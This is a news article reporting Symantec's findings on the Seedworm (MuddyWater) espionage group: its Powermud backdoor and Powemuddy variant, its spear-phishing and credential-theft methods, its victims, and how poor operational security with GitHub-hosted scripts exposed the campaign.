IT firms, telcos among dozens hacked in new info-stealing malware attack

Seedworm hacking operation adopts new techniques to speed up attacks - but it's come at a cost that's allowed researchers to uncover their activity.
Written by Danny Palmer, Senior Writer

A cyber espionage group is deploying a new type of trojan malware against telecommunications, information technology, and government organisations.

Dubbed Seedworm, the group has been operating since at least 2017, and although it predominantly looks to infiltrate organisations in the Middle East, organisations based in Europe and North America have also been targets.

The hacking operation -- also known as MuddyWater -- has been highly active in recent months and researchers at Symantec say the espionage campaign has stolen information from more than 130 victims across 30 organisations since September this year. The attacks appear to be focused on stealing passwords, especially for web accounts, as well as internal communications data and other information.

Seedworm's latest campaign was uncovered after researchers discovered evidence of activity on a computer inside the Brazil-based embassy of what Symantec refers to as "an oil-producing nation".

The embassy computer had also been compromised by Russian hacking group APT28 -- aka FancyBear -- but there's no evidence to suggest the hacking groups were aware of each other.

However, due to what researchers describe as "a preference for speed and agility over operational security", it was possible to trace Seedworm's activity, revealing what the attackers took once they got into the network and how they did it.

Since the group begun operating, Seedworm has employed a custom backdoor called Powermud, which has been continually updated in an effort to avoid detection.

Spear-phishing is the key means of delivering the malware, which once installed on a target system first runs tools designed to steal passwords saved in the user's web browsers and email. Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials and to move across the network.

SEE: What is malware? Everything you need to know about viruses, trojans and malicious software

But thanks to poor operational security by the attackers, researchers have uncovered a new variant of the Powermud backdoor -- Powemuddy -- which enables additional activity and has helped Seedworm to successfully compromise 30 organisations in the space of a few months.

In total, 131 individuals were found to be infected with Seedworm malware, with the highest concentration in the Middle East -- however multinational organisations with interests in the area, but operating in Europe and North America were also found to have been compromised. It's highly likely the attackers planned to compromise specific targets.

"The organisations with more than three or four victims almost certainly were targeted by the Seedworm actors specifically and were not accidental compromises. The organisations with multiple victims likely had multiple employees sent spear phishing emails," Jonathan Wrolstad, threat researcher at Symantec told ZDNet.

However, in order to help speed up the campaign, Seedworm took to storing scripts in a GitHub repository. While this allowed the group to speed up their operations, it came at the cost of operational security and allowed researchers to uncover the activity.

"We think the Seedworm actors use GitHub like a notepad to store their scripts for easy access. This shows how they value speed and agility over the security of their operations. There is nothing in the scripts that self-evidently shows that the scripts are being used for malicious activity. The scripts are similar to those that a red team may also use," said Wrolstad.

Nonetheless, despite leaving a trail of activity, Seedworm should still be classed as a skilled cyber espionage group focused on high-value targets.

Symantec has notified organisations about Seedworm's latest targets and techniques and has provided a list of Indicators of Compromise.


Editorial standards